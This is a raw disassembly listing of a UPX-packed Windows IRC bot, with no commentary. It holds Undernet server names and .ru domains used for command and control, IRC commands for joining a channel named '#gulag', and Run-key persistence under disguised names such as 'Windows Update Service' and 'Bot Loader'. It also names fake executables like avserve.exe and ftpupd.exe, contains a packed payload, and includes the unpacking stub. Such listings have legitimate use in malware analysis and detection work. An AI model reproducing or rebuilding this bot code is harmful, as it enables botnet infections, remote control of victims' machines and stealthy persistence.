aFlanders_be_eu db 'flanders.be.eu.undernet.org',0 ; DATA XREF: UPX0:31304BCC�o
aGraz_at_eu_und db 'graz.at.eu.undernet.org',0 ; DATA XREF: UPX0:31304BC8�o
aGazProm_ru db 'gaz-prom.ru',0 ; DATA XREF: UPX0:31304BC4�o
aMoscowAdvokat_ db 'moscow-advokat.ru',0 ; DATA XREF: UPX0:off_31304BC0�o
align 4
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31301D2B+1C�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31301D2B+C�o
align 10h
aUserS8S db 'USER %s 8 * :%s',0Dh,0Ah,0 ; DATA XREF: sub_31301E60+1C4�o
align 4
aAlready db 'already',0 ; DATA XREF: sub_31301E60+133�o
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_31301E60+D9�o
; sub_31301E60+165�o
align 4
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_31301E60+9C�o
align 4
aPongS db 'PONG%s',0Dh,0Ah,0 ; DATA XREF: sub_313020A2+4F�o
align 10h
aPing db 'PING',0 ; DATA XREF: sub_313020A2+C�o
; sub_31302125:loc_313021C7�o
align 4
a451 db '451',0 ; DATA XREF: sub_31302125+8E�o
aJoinS db 'JOIN %s',0Dh,0Ah,0 ; DATA XREF: sub_31302125+16�o
align 4
aQuitS db 'QUIT %s',0Dh,0Ah,0 ; DATA XREF: sub_313021F7+2C�o
align 4
aPrivmsgSS db 'PRIVMSG %s %s',0Dh,0Ah,0 ; DATA XREF: sub_3130235D+3B�o
aGulag db '#gulag',0 ; DATA XREF: UPX0:3130259D�o
align 4
a9: ; DATA XREF: UPX0:3130248A�o
unicode 0, <9>,0
a_: ; DATA XREF: UPX0:3130247F�o
unicode 0, <_>,0
a_exe db '.exe',0 ; DATA XREF: sub_3130263B+75�o
; sub_31303575+4B�o
align 4
asc_31304DDC: ; DATA XREF: sub_3130263B+49�o
; sub_31303575+56�o
unicode 0, <\>,0
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_3130263B+13�o
align 4
aJoin db 'JOIN',0 ; DATA XREF: sub_31302755+2EB�o
align 4
aQ: ; DATA XREF: sub_31302755+2C6�o
unicode 0, <q>,0
aDD9SD db '%d,%d,9%s,%d',0 ; DATA XREF: sub_31302755+2A0�o
align 10h
aI: ; DATA XREF: sub_31302755+256�o
unicode 0, <i>,0
asc_31304E34: ; DATA XREF: sub_31302755+23D�o
unicode 0, <|>,0
aE: ; DATA XREF: sub_31302755+148�o
unicode 0, <e>,0
a1D db '-1,%d',0 ; DATA XREF: sub_31302755+79�o
align 4
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:31302DC1�o
align 10h
aU9 db 'u9',0 ; DATA XREF: sub_31302E37+3A�o
align 4
aU7 db 'u7',0 ; DATA XREF: sub_31302E37+2E�o
align 4
aU6 db 'u6',0 ; DATA XREF: sub_31302E37+24�o
align 4
aU9x db 'u9x',0 ; DATA XREF: sub_31302E37+B�o
asc_31304E60 db 0Dh,0Ah,0 ; DATA XREF: sub_31302F59+124�o
align 4
aUseridUnix db ' : USERID : UNIX : ',0 ; DATA XREF: sub_31302F59+104�o
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_31302C49+23�o
; sub_313034CE+58�o ...
align 4
aUpdateService db 'Update Service',0 ; DATA XREF: sub_31302C49+1C�o
; sub_31303575+87�o ...
align 4
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31303641+5A�o
; sub_31303641+94�o
aClient db 'Client',0 ; DATA XREF: sub_31303641+55�o
; sub_31303641+8E�o
align 4
aAvserve2_exe db 'avserve2.exe',0 ; DATA XREF: sub_313034CE+47�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_313034CE+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_313034CE+39�o
align 10h
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_313034CE+32�o
align 4
aSystray db 'SysTray',0 ; DATA XREF: sub_313034CE+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_313034CE+24�o
align 10h
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_313034CE+1D�o
align 4
aSystemServiceM db 'System Service Manager',0 ; DATA XREF: sub_313034CE+16�o
align 10h
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_313034CE+F�o
align 4
a1: ; DATA XREF: sub_31303641+50�o
unicode 0, <1>,0
dd 6 dup(0)
dword_31304F98 dd 0 ; DATA XREF: UPX0:31302447�w
; UPX0:31302586�w ...
dword_31304F9C dd 0 ; DATA XREF: UPX0:loc_313024A0�o
; sub_31302755+E9�r ...
dword_31304FA0 dd 8 dup(0) ; DATA XREF: UPX0:313024A8�o
; sub_31302755+A�o
dword_31304FC0 dd 0 ; DATA XREF: sub_31302755+266�o
dword_31304FC4 dd 0 ; DATA XREF: sub_31302BFB+D�r
; sub_31302C49+80�w
dword_31304FC8 dd 0 ; DATA XREF: sub_31302755+29A�r
; sub_31302BFB+25�o ...
dword_31304FCC dd 0 ; DATA XREF: sub_31302BFB+7�r
; sub_31302C49+75�w ...
dword_31304FD0 dd 60h ; DATA XREF: sub_31301C20+C2�r
; UPX0:31302DE1�w ...
dword_31304FD4 dd 0 ; DATA XREF: sub_31302E23+2�r
; sub_31302E37+1A�w
dword_31304FD8 dd 8 dup(0) ; DATA XREF: sub_31302F59+2E�o
dword_31304FF8 dd 0 ; DATA XREF: sub_31302C49+E0�w
; sub_31303256+55�r
dword_31304FFC dd 31300000h ; DATA XREF: sub_31301C20+6�r
; UPX0:31302DC6�w
UPX0 ends
; Section 2. (virtual address 00005000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00005000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31305000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31305000 dd 0 ; DATA XREF: sub_31302755+294�r
; sub_31303112+36�o ...
dword_31305004 dd 0 ; DATA XREF: sub_31302755+282�r
; sub_31303256+37�w ...
dword_31305008 dd 0 ; DATA XREF: UPX0:3130246C�r
; sub_31303641+3C�w ...
dd 3FDh dup(0)
dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh
dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h
dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 65540100h
dd 6E696D72h, 54657461h, 61657268h, 44010064h, 74656C65h
dd 6C694665h, 1004165h, 74697845h, 636F7250h, 737365h
dd 74654701h, 656C6946h, 657A6953h, 65520100h, 69466461h
dd 100656Ch, 65746E49h, 636F6C72h, 4964656Bh, 6572636Eh
dd 746E656Dh, 72430100h, 65746165h, 636F7250h, 41737365h
dd 72430100h, 65746165h, 6574754Dh, 1004178h, 7274736Ch
dd 41706D63h, 65470100h, 636F4C74h, 49656C61h, 416F666Eh
dd 736C0100h, 70637274h, 1004179h, 4C746547h, 45747361h
dd 726F7272h, 79530100h, 6D657473h, 656D6954h, 69466F54h
dd 6954656Ch, 100656Dh, 53746547h, 65747379h, 6D69546Dh
dd 43010065h, 65736F6Ch, 646E6148h, 100656Ch, 74697257h
dd 6C694665h, 43010065h, 74616572h, 6C694665h, 1004165h
dd 7274736Ch, 6E797063h, 53010041h, 75437465h, 6E657272h
dd 72694474h, 6F746365h, 417972h, 74654701h, 74737953h
dd 69446D65h, 74636572h, 4179726Fh, 78450100h, 68547469h
dd 64616572h, 65530100h, 65764574h, 100746Eh, 74696157h
dd 53726F46h, 6C676E69h, 6A624F65h, 746365h, 65724301h
dd 54657461h, 61657268h, 43010064h, 74616572h, 65764565h
dd 41746Eh, 74736C01h, 6E656C72h, 53010041h, 7065656Ch
dd 65470100h, 72754374h, 746E6572h, 636F7250h, 737365h
dd 74654701h, 636F7250h, 72646441h, 737365h, 74654701h
dd 75646F4Dh, 6148656Ch, 656C646Eh, 57010041h, 65746972h
dd 636F7250h, 4D737365h, 726F6D65h, 4F010079h, 506E6570h
dd 65636F72h, 1007373h, 54746547h, 436B6369h, 746E756Fh
dd 736C0100h, 61637274h, 4174h, 0D1h, 0
dd 67655201h, 61657243h, 654B6574h, 41784579h, 65520100h
dd 74655367h, 756C6156h, 41784565h, 65520100h, 65755167h
dd 61567972h, 4565756Ch, 1004178h, 4F676552h, 4B6E6570h
dd 78457965h, 52010041h, 65446765h, 6574656Ch, 756C6156h
dd 1004165h, 43676552h, 65736F6Ch, 79654Bh, 6F624101h
dd 79537472h, 6D657473h, 74756853h, 6E776F64h, 43010041h
dd 74707972h, 61657243h, 61486574h, 1006873h, 70797243h
dd 73614874h, 74614468h, 43010061h, 74707972h, 69726556h
dd 69537966h, 74616E67h, 41657275h, 72430100h, 44747079h
dd 72747365h, 6148796Fh, 1006873h, 70797243h, 73654474h
dd 796F7274h, 79654Bh, 79724301h, 65527470h, 7361656Ch
dd 6E6F4365h, 74786574h, 72430100h, 41747079h, 69757163h
dd 6F436572h, 7865746Eh, 1004174h, 70797243h, 706D4974h
dd 4B74726Fh, 7965h, 0DEh, 0F4h, 72747301h, 797063h, 72747301h
dd 746163h, 6F746101h, 73010069h, 646E6172h, 455F0100h
dd 72705F48h, 676F6C6Fh, 5F5F0100h, 46787843h, 656D6172h
dd 646E6148h, 72656Ch, 72747301h, 727473h, 72747301h, 726863h
dd 72747301h, 6E656Ch, 6D656D01h, 746573h, 6D656D01h, 797063h
dd 6E617201h, 0E9000064h, 28000000h, 1000001h, 646E6946h
dd 646E6957h, 41776Fh, 74654701h, 65726F46h, 756F7267h
dd 6957646Eh, 776F646Eh, 65470100h, 6E695774h, 54776F64h
dd 61657268h, 6F725064h, 73736563h, 1006449h, 72707377h
dd 66746E69h, 0F4000041h, 3C000000h, 1000001h, 65746E49h
dd 74656E72h, 43746547h, 656E6E6Fh, 64657463h, 74617453h
dd 49010065h, 7265746Eh, 4F74656Eh, 416E6570h, 6E490100h
dd 6E726574h, 65527465h, 69466461h, 100656Ch, 65746E49h
dd 74656E72h, 6E65704Fh, 416C7255h, 1000000h, 1500000h
dd 73FF0000h, 8FF00h, 0FF0039FFh, 0BFF006Fh, 34FF00h, 0FF0012FFh
dd 4FF000Ch, 16FF00h, 0FF0017FFh, 2FF0009h, 0DFF00h, 0FF0001FFh
dd 10FF0003h, 13FF00h, 0
dd 455000h, 2014C00h, 0BB372600h, 40h, 0
dd 0F00E000h, 6010B01h, 300000h, 120000h, 0
dd 2DB900h, 100000h, 400000h, 30000000h, 100031h, 20000h
dd 400h, 0
dd 400h, 0
dd 600000h, 40000h, 0
dd 200h, 10000000h, 100000h, 10000000h, 100000h, 0
dd 1000h, 2 dup(0)
dd 385800h, 8C00h, 14h dup(0)
dd 100000h, 19C00h, 6 dup(0)
dd 65742E00h, 7478h, 2FD800h, 100000h, 300000h, 40000h
dd 3 dup(0)
dd 4002000h, 61642EE0h, 6174h, 100C00h, 400000h, 100000h
dd 340000h, 3 dup(0)
dd 4000h, 5000C0h, 3A8000h, 550100h, 9E982900h, 53896620h
dd 70CB1FEh, 0A3ECCA94h, 1DA11E75h, 0FFFFE8F9h, 0C5B4FFFFh
dd 0DB1A4ECBh, 3969D7F0h, 948C1A87h, 1318C67Bh, 0BF3EB382h
dd 67E0424Bh, 378400EBh, 0FFFF60B7h, 0B3AAFFFFh, 8022D7D8h
dd 0A67A6504h, 5886FF4Bh, 6EF64585h, 0C956EEF9h, 4A32002Fh
dd 7AB7A63Bh, 0DBFFD3D8h, 63EBF8B0h, 0BE746E6Fh, 0D5361278h
dd 5DABAAAAh, 6DFFC933h, 0B966FFFBh, 758D0225h, 8AFE8B05h
dd 7993C06h, 302C0646h, 88993446h, 0FF7F4707h, 0EDE2FC5Dh
dd 0DAE80AEBh, 65622EF9h, 93712E67h, 1201C999h, 0FEFEBDFDh
dd 0FD91EDFFh, 72C10716h, 0FD42AA68h, 10FDAA66h, 0F11C14BAh
dd 0F3C91A98h, 763FF698h, 28608FBh, 90100971h, 9237CB5Fh
dd 0BB1C9659h, 6FB5ED0Dh, 375183Bh, 25CD089Bh, 83B72510h
dd 0E4D291FDh, 185447ECh, 9FF31B5Dh, 0FD9BF344h, 71D8FF63h
dd 68F319AFh, 1C1065E3h, 751A0B1Dh, 9D5EFFD9h, 0B7B5BDBDh
dd 12FF24DAh, 0DD10FF12h, 0AC4F070Ah, 0FB7FEC33h, 9D0B00CEh
dd 0E51459B2h, 12323298h, 0CA89F345h, 67332C66h, 71F67FDFh
dd 6713B36Fh, 5D1A7441h, 11348AD9h, 7DEEBAF3h, 4F19DDBh
dd 4F10989h, 652EF32Dh, 4FDB66CBh, 0F0E3F367h, 2182E576h
dd 0B264FDB6h, 6F2E56C9h, 2097C0E8h, 0B6EB169Bh, 0D83C4C9Fh
dd 8ED5E5C1h, 3BC919C9h, 0DFEC7B3Fh, 414D901h, 71CA23F6h
dd 688D6329h, 2FEE9161h, 0C3F22C8Ch, 0A7ED66F4h, 6C5D12CDh
dd 0DACDB272h, 794ECBC9h, 0FE11F256h, 5A7F64C9h, 0C096A648h
dd 294CE114h, 9CF3EBA7h, 0CB93F7C9h, 0F434FF5Dh, 0C2D07126h
dd 0FECDFFFEh, 0EF133BF9h, 0F0BA0ECh, 0EDFFC5B7h, 0FDE9ECE9h
dd 0FCE1FCB7h, 7605FC2Fh, 0FCF5CA01h, 0F2CEE9FCh, 0FFFFEBFCh
dd 0FCF7F97Fh, 0C7ABAAF5h, 59AAF934h, 662A2DB4h, 0E6ACC91Eh
dd 0C9A5B7E7h, 9DB8BD9Ch, 0CFE37D82h, 3092712Eh, 513519BFh
dd 0A951E14h, 0FFFF9172h, 712AD8C1h, 0A5D230C8h, 0E180D512h
dd 6FAA529Ah, 9A2A8D14h, 0B785B9C8h, 8B12F6FFh, 58474A9Ah
dd 9BAB9E59h, 20A319DBh, 0C0A26CECh, 0FFFB7FFFh, 0DF9EED85h
dd 0EB81E8A2h, 0C8125544h, 2E961FBDh, 0D812EB8Dh, 125A9A85h
dd 5A9A099Dh, 9A1613FFh, 192DF810h, 7F664917h, 8712FEFDh
dd 0DEDDB6A9h, 95C25A76h, 82128502h, 0CB5A9104h, 0DFD4CFF7h
dd 85DE8C1Fh, 424D53FFh, 53180972h, 0EFFFFFC8h, 0FEC990h
dd 2006217h, 4E204350h, 4F575445h, 50204B52h, 97DAC752h
dd 52474FFFh, 31204D41h, 414C302Eh, 0A024D4Eh, 6FED6957h
dd 646EFA5Fh, 8C73776Fh, 5720726Fh, 72676B03h, 0E70756Fh
dd 0F75BF61Dh, 61312E33h, 32234D27h, 32303058h, 5B063232h
dd 0A16ADFEh, 4C20544Eh, 3230204Dh, 2B00A48Bh, 7737919h
dd 0BB7D8363h, 23FF0C3Eh, 0A110400h, 0D4052014h, 1BB5BEAh
dd 4C00694Dh, 5053534Bh, 253B7F00h, 82979AFFh, 57E008h
dd 64006E24h, 0DB006F00h, 77EE6D8Bh, 743A7300h, 8C090130h
dd 12DB9839h, 233500D9h, 72E1Dh, 0D9139E4h, 2008ABDAh
dd 499270DAh, 39F5706h, 60D83200h, 23466E27h, 0FF400747h
dd 603C8DCh, 1100600h, 888A151Fh, 7FFFD8E0h, 4F0048F9h
dd 19814400h, 0E4F27A6Ah, 0AF281C49h, 10742530h, 53E15367h
dd 5C1137C8h, 0EB3075DFh, 0CB075Ch, 12F5C04h, 615C085Ah
dd 0DD772363h, 36072E4Dh, 772E3800h, 0D839B330h, 491B76h
dd 6443ECh, 0E7900F3Fh, 0A26463B0h, 0F20FDC08h, 400496DFh
dd 0DE00FF16h, 0E00DEh, 2019F16h, 6121309Bh, 19284026h
dd 0F7DC346Fh, 6C8B1103h, 70D374D9h, 214B6300h, 9C2A65DFh
dd 0EE9F256Bh, 106D9EC0h, 1B04480Eh, 6E7D1354h, 5A54BAEBh
dd 22596326h, 45CBC75Ch, 0CFF9A41Dh, 58765h, 4810030Bh
dd 4FFF10B8h, 4901A09Ah, 19286A01h, 0D0B10C39h, 2FA89B11h
dd 0FD8FFCh, 2ED94FC0h, 885D5FF5h, 0C91CEB8Ah, 3CE89F11h
dd 0CF48102Bh, 60B2F645h, 0A3F40CD1h, 8790A060h, 0A00C92BCh
dd 7F0CB10Ch, 64727h, 40880CA0h, 8F000900h, 0ECDF24F0h
dd 95000703h, 7C4F4014h, 14BD4070h, 0BF60D9h, 0F84F4307h
dd 7813911Fh, 0AB001385h, 13E9A65Bh, 39E3F810h, 0FF2F3C81h
dd 60230EFEh, 40182C18h, 0F284087Ah, 88E93EE9h, 0EE10B943h
dd 10B801FFh, 793C9B30h, 0DAD200Ch, 0AF2CF07h, 0D80F7FF9h
dd 84700118h, 92BC87C8h, 950F840Fh, 4F26000Fh, 7F02037Eh
dd 0F6C0F84h, 0C3C2556Fh, 6FA89A00h, 46042743h, 69231364h
dd 5840DB6Eh, 205058F9h, 46007250h, 0A1F9014Ah, 323B6790h
dd 15123C6Bh, 89AF0275h, 53412790h, 0FF9E1C00h, 1645395h
dd 5CCC06EBh, 5C73255Ch, 0F37FFF2Fh, 24637069h, 1CEC8166h
dd 0E4FF07h, 65446553h, 69677562h, 0F64C6976h, 656CF3FFh
dd 64416567h, 7473756Ah, 656B6F54h, 0EE73176Eh, 4CDB724Fh
dd 7075126Fh, 756C6156h, 0FF174165h, 4FDFB6C5h, 636F2870h
dd 43347324h, 61766461h, 8FF11670h, 0EF3369C1h, 72657475h
dd 95395F6Dh, 0FFC4A29Bh, 5F6C6C65h, 79617254h, 72634157h
dd 0DBB9DF65h, 521A61B7h, 56F6D65h, 140C6854h, 74726956h
dd 0ADDADD75h, 2841586Dh, 0F78454Fh, 6C6E724Eh, 35ACE817h
dd 0F8F30447h, 0D3E0034Ch, 0C4D34D34h, 507090ACh, 4D34D365h
dd 182834h, 46FF4BF4h, 634E6FEDh, 72616B2Eh, 67E6442Eh
dd 6F707361h, 6E7F6564h, 7A2EEE89h, 0B92E0D61h, 6C570967h
dd 3FE16169h, 251366F7h, 7374330Fh, 75722E6Bh, 9A26EDDAh
dd 2E6EEC86h, 75650D75h, 0B175B005h, 3B8E0BD7h, 684F7727h
dd 0BBAD0AC8h, 1F7467CEh, 1F323164h, 0FE56DBB2h, 2D736F6Ch
dd 1A65BE61h, 0A6206163h, 62BB42B6h, 731D3160h, 2DB76549h
dd 652F5D65h, 17726655h, 3DEC0985h, 0E616C66h, 0E1596733h
dd 7AC2B2B6h, 1617512Eh, 869F702Dh, 6D6FB54Bh, 0F2936DD0h
dd 0DB9E2D77h, 0A90AE785h, 62ABE22Ah, 7E662D63h, 67B7FDA1h
dd 6C6B6ACBh, 706F6E6Dh, 76835E71h, 7A797877h, 25FFE5ABh
dd 434241C9h, 47464544h, 4B4A4948h, 0A85BF84Eh, 52517C40h
dd 0A7EB5453h, 0F6EF1B5Ah, 53557E37h, 52205245h, 2A203820h
dd 0D073A20h, 742B4B0Ah, 0C76C8789h, 4349F879h, 0C9EC1341h
dd 0EE500636h, 4E4F0B53h, 0F0BB0A47h, 490BDD2Bh, 0AE353407h
dd 0E20C4F4Ah, 2F587E49h, 54495551h, 0A1564952h, 41DBD8F0h
dd 23116647h, 3B017567h, 86B666C6h, 0EC5F034Dh, 0D6E8B378h
dd 4D812BF8h, 1D987A6Fh, 70BB342Fh, 20A55DBBh, 706DE528h
dd 7C6269E0h, 0D040203Bh, 497D0B90h, 0BB362045h, 0C5F3203Bh
dd 3590D42Eh, 7700298Dh, 0E7DD713Fh, 6425775Ah, 6739022Ch
dd 3691306h, 0F67D2D7Ch, 312D6033h, 70746614h, 0AF1A6402h
dd 75759EE9h, 36370339h, 0FBC2AC0Bh, 8B0F0B0h, 44491620h
dd 46FF0408h, 658DC37h, 51464FF7h, 5C455241h, 0F063694Dh
dd 860BB6C1h, 5C436F73h, 75435C87h, 346F4F72h, 746E2FBCh
dd 4669D156h, 3C75525Ch, 6DB6BA55h, 2017606Ah, 30761453h
dd 61315367h, 6B31E1ADh, 1B723F27h, 56E9635Ch, 3FBC4395h
dd 0C5737677h, 2E76CD92h, 0F993265h, 0C8DCCD0Eh, 1757F486h
dd 69F4B412h, 7379D117h, 8B420098h, 0CC5BA520h, 3D61E7B1h
dd 206D1B13h, 0D606CDA0h, 8F460668h, 14685717h, 915D0F82h
dd 6F652F91h
dd 1867B0DBh, 7469D663h, 54411979h, 2400B512h, 18322A0Ah
dd 515350E9h, 7EC9C4C9h, 13F9C56h, 65724664h, 0FFC50C65h
dd 0D7115EDh, 4D746547h, 6C75646Fh, 0BFF74665h, 4EE36F15h
dd 1E06D61h, 7274736Ch, 69706D63h, 0DC0B7B0Ah, 706F437Bh
dd 0ED0A1979h, 32657845h, 8563E2B7h, 6F6F54C6h, 3370DF6Ch
dd 0FFB5026Dh, 616E5332h, 6F687370h, 12141974h, 6EEA056Bh
dd 0F737232h, 2C350754h, 982C07B0h, 654E2118h, 0E2152078h
dd 10E3409h, 0EC97E544h, 710DAC16h, 3974696Eh, 0BAE7B7A8h
dd 6953163Fh, 2C52C37Ah, 6E49090Dh, 40AEEDB5h, 656BC96Ch
dd 44630A64h, 0AD66C9B0h, 75A210C0h, 0CBB10F41h, 984DE816h
dd 5441DF78h, 0B79761E4h, 6C613B4Ch, 196F6665h, 51187970h
dd 0D611B7Eh, 6F727245h, 0EC590172h, 6954F73Dh, 977F66Dh
dd 0B8AD1823h, 0FF646E15h, 7BAE4865h, 977F66C3h, 0C7697257h
dd 27610B7Ch, 6E2EEB45h, 0E3E530Ah, 0B11AF644h, 7363DD11h
dd 0E105478h, 9144B03h, 0BDB2DB22h, 764536DDh, 466163E5h
dd 0EE615320h, 5B9340ADh, 2E6A624Fh, 0D9B1606Dh, 2F0D2CB0h
dd 8B762C7Ch, 67B29B5h, 826C7065h, 0C212FF78h, 64410B67h
dd 0B00F7264h, 20CB6760h, 2FDA41D9h, 6D735125h, 13A1A74Dh
dd 0A146D12h, 911132B1h, 1B26753Bh, 0F1A5EC5Bh, 0D1964184h
dd 1E13F3B9h, 4B9167BEh, 10457965h, 0C89D876Bh, 510F60D6h
dd 0D808580Ah, 6311584Bh, 8B30EF30h, 10212ACDh, 8385517Fh
dd 410C6ED0h, 53459462h, 6F66F468h, 0F3A414AFh, 74707972h
dd 0AC17DB77h, 10B0CBD1h, 6112440Ah, 662BB858h, 6669990Eh
dd 76675279h, 95EB586Dh, 6C362B75h, 77796FC5h, 2CF616F6h
dd 52106F11h, 0D68F678Fh, 0F5651E36h, 4114DBF4h, 0F90D871Ah
dd 69757163h, 7C494D72h, 0E7059A71h, 0DE133AA0h, 3B9BBAF4h
dd 6107179Bh, 696F033Eh, 835B720Dh, 67519BEh, 5F48455Fh
dd 1367E0D1h, 0B77A54Ch, 7878435Fh, 3691AACAh, 72B1733Bh
dd 683B0233h, 6C581707h, 226ECADBh, 774906Dh, 0B3661A5Bh
dd 0E9724CBDh, 0C7920128h, 0ED1588Ch, 624B77C3h, 65404CC3h
dd 6E1415DCh, 0ACC6610h, 9149E14Fh, 0DADECEF4h, 198F7377h
dd 0BE416674h, 0CE8E4F3Ch, 848BE899h, 8E6EF035h, 4B866587h
dd 6E745394h, 42C1C31Ah, 0E41B2D2h, 104020C7h, 0BD55B6A3h
dd 2CB2C641h, 7317F6CBh, 6F390802h, 2CB2CB0Bh, 0C1234CBh
dd 2C171604h, 92CB2CBh, 3010D02h, 0B2D523F9h, 50BF1310h
dd 4C000045h, 10FF9601h, 40BB3778h, 0F00E02Dh, 6010B01h
dd 3CD26E30h, 2DB91269h, 0C9661810h, 0B31B1AAh, 0EC070C02h
dd 0CE92DCCh, 10341E60h, 0E04BCB07h, 58D9060Dh, 0BB618C38h
dd 9C642101h, 0B60D1E01h, 6C2E5C7Bh, 902FD807h, 82107C30h
dd 461C481h, 0D8642EE0h, 0F87B6437h, 34070CFBh, 0A1405B27h
dd 48C0165Bh, 3ADCh, 55910DC0h, 1200000h, 0FF0000h, 2 dup(0)
; ---------------------------------------------------------------------------
public start
start:
pusha
mov esi, offset dword_31305000
lea edi, [esi-4000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_313071A2
; ---------------------------------------------------------------------------
align 8
loc_31307198: ; CODE XREF: UPX1:loc_313071A9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_3130719E: ; CODE XREF: UPX1:31307236�j
; UPX1:3130724D�j
add ebx, ebx
jnz short loc_313071A9
loc_313071A2: ; CODE XREF: UPX1:31307190�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_313071A9: ; CODE XREF: UPX1:313071A0�j
jb short loc_31307198
mov eax, 1
loc_313071B0: ; CODE XREF: UPX1:313071BF�j
; UPX1:313071CA�j
add ebx, ebx
jnz short loc_313071BB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_313071BB: ; CODE XREF: UPX1:313071B2�j
adc eax, eax
add ebx, ebx
jnb short loc_313071B0
jnz short loc_313071CC
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_313071B0
loc_313071CC: ; CODE XREF: UPX1:313071C1�j
xor ecx, ecx
sub eax, 3
jb short loc_313071E0
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_31307252
mov ebp, eax
loc_313071E0: ; CODE XREF: UPX1:313071D1�j
add ebx, ebx
jnz short loc_313071EB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_313071EB: ; CODE XREF: UPX1:313071E2�j
adc ecx, ecx
add ebx, ebx
jnz short loc_313071F8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_313071F8: ; CODE XREF: UPX1:313071EF�j
adc ecx, ecx
jnz short loc_3130721C
inc ecx
loc_313071FD: ; CODE XREF: UPX1:3130720C�j
; UPX1:31307217�j
add ebx, ebx
jnz short loc_31307208
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31307208: ; CODE XREF: UPX1:313071FF�j
adc ecx, ecx
add ebx, ebx
jnb short loc_313071FD
jnz short loc_31307219
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_313071FD
loc_31307219: ; CODE XREF: UPX1:3130720E�j
add ecx, 2
loc_3130721C: ; CODE XREF: UPX1:313071FA�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_3130723C
loc_3130722D: ; CODE XREF: UPX1:31307234�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_3130722D
jmp loc_3130719E
; ---------------------------------------------------------------------------
align 4
loc_3130723C: ; CODE XREF: UPX1:3130722B�j
; UPX1:31307249�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_3130723C
add edi, ecx
jmp loc_3130719E
; ---------------------------------------------------------------------------
loc_31307252: ; CODE XREF: UPX1:313071DC�j
pop esi
mov edi, esi
mov ecx, 0B2h
loc_3130725A: ; CODE XREF: UPX1:31307261�j
; UPX1:31307266�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_3130725F: ; CODE XREF: UPX1:31307284�j
cmp al, 1
ja short loc_3130725A
cmp byte ptr [edi], 1
jnz short loc_3130725A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_3130725F
lea edi, [esi+5000h]
loc_3130728C: ; CODE XREF: UPX1:313072AE�j
mov eax, [edi]
or eax, eax
jz short loc_313072D7
mov ebx, [edi+4]
lea eax, [eax+esi+7000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+708Ch]
xchg eax, ebp
loc_313072A9: ; CODE XREF: UPX1:313072CF�j
mov al, [edi]
inc edi
or al, al
jz short loc_3130728C
mov ecx, edi
jns short near ptr loc_313072BA+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_313072BA: ; CODE XREF: UPX1:313072B2�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+7090h]
or eax, eax
jz short loc_313072D1
mov [ebx], eax
add ebx, 4
jmp short loc_313072A9
; ---------------------------------------------------------------------------
loc_313072D1: ; CODE XREF: UPX1:313072C8�j
call dword ptr [esi+7094h]
loc_313072D7: ; CODE XREF: UPX1:31307290�j
popa
jmp loc_31302DB9
; ---------------------------------------------------------------------------
align 1000h
UPX1 ends
; Section 3. (virtual address 00008000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00008000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
UPX2 segment para public 'DATA' use32
assume cs:UPX2
;org 31308000h
dd 3 dup(0)
